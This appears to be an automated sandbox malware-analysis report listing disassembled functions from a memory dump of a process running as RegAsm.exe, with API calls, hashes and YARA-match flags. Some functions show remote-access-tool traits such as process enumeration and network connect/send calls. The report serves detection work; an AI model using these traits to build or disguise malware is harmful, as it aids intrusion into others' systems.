                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                          • API String ID: 3024135584-2418719853
                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                          Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                          Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                          • _free.LIBCMT ref: 0044943D
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 00449609
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                          • String ID:
                          • API String ID: 1286116820-0
                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                          Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                          • String ID:
                          • API String ID: 2180151492-0
                          • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                          • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                          • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                          • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                          Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                          Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                          • __alloca_probe_16.LIBCMT ref: 00451231
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                          • __freea.LIBCMT ref: 0045129D
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                          • String ID:
                          • API String ID: 313313983-0
                          • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                          • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                          Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                          • _free.LIBCMT ref: 100071B8
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                          Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                          • _free.LIBCMT ref: 0044F43F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                          • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                          Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                          • _free.LIBCMT ref: 10005BB4
                          • _free.LIBCMT ref: 10005BDB
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                          Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                          • _free.LIBCMT ref: 00448353
                          • _free.LIBCMT ref: 0044837A
                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                          Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat
                          • String ID:
                          • API String ID: 493641738-0
                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                          Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 100091D0
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100091E2
                          • _free.LIBCMT ref: 100091F4
                          • _free.LIBCMT ref: 10009206
                          • _free.LIBCMT ref: 10009218
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                          Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00450A54
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 00450A66
                          • _free.LIBCMT ref: 00450A78
                          • _free.LIBCMT ref: 00450A8A
                          • _free.LIBCMT ref: 00450A9C
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                          Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 1000536F
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 10005381
                          • _free.LIBCMT ref: 10005394
                          • _free.LIBCMT ref: 100053A5
                          • _free.LIBCMT ref: 100053B6
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                          Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00444106
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 00444118
                          • _free.LIBCMT ref: 0044412B
                          • _free.LIBCMT ref: 0044413C
                          • _free.LIBCMT ref: 0044414D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                          Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          • _strpbrk.LIBCMT ref: 0044E7B8
                          • _free.LIBCMT ref: 0044E8D5
                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                          • String ID: *?$.
                          • API String ID: 2812119850-3972193922
                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                          Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00D64950,00000010), ref: 004048E0
                            • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                          • String ID: XQG$NG$PG
                          • API String ID: 1634807452-3565412412
                          • Opcode ID: 939bf58f81ce87eae8e0c48e6a49ef516d453a11c12e42025cfdb8a130c33550
                          • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                          • Opcode Fuzzy Hash: 939bf58f81ce87eae8e0c48e6a49ef516d453a11c12e42025cfdb8a130c33550
                          • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                          Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                          • _free.LIBCMT ref: 10004CE8
                          • _free.LIBCMT ref: 10004CF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          • API String ID: 2506810119-1068371695
                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                          Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                          • _free.LIBCMT ref: 004435E0
                          • _free.LIBCMT ref: 004435EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          • API String ID: 2506810119-1068371695
